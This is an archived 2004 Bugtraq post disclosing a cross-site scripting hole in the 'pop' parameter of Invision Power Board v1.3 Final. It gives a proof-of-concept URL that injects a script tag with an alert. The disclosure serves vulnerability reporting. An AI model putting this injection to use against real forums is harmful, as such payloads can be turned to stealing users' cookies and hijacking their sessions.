[34075] in bugtraq

home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Invision Power Board v1.3 Final Cross Site Scripting 2 - Addon

daemon@ATHENA.MIT.EDU (Rafel Ivgi, The-Insider)
Tue Mar 9 12:28:19 2004

Message-ID: <004501c40598$ecb26a60$0b3016ac@fucku>
Reply-To: "Rafel Ivgi, The-Insider" <theinsider@012.net.il>
From: "Rafel Ivgi, The-Insider" <theinsider@012.net.il>
To: "bugtraq" <bugtraq@securityfocus.com>
Cc: "SecurITeam News" <news@securiteam.com>,
        "securitytracker" <bugs@securitytracker.com>
Date: Tue, 9 Mar 2004 07:39:43 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="windows-1255"
Content-Transfer-Encoding: 7bit

Hi Everyone!
I Just found more XSS at "Invision Power Board v1.3 Final" forum.
This is the new hole:
http://<host>/forum//index.php?s=&act=chat&pop=1;'><script>alert('this could
be your cookie')</script><plaintext>
it is at the "pop" field.

Rafel Ivgi, The-Insider.

home	help	back	first	fref	pref	prev	next	nref	lref	last	post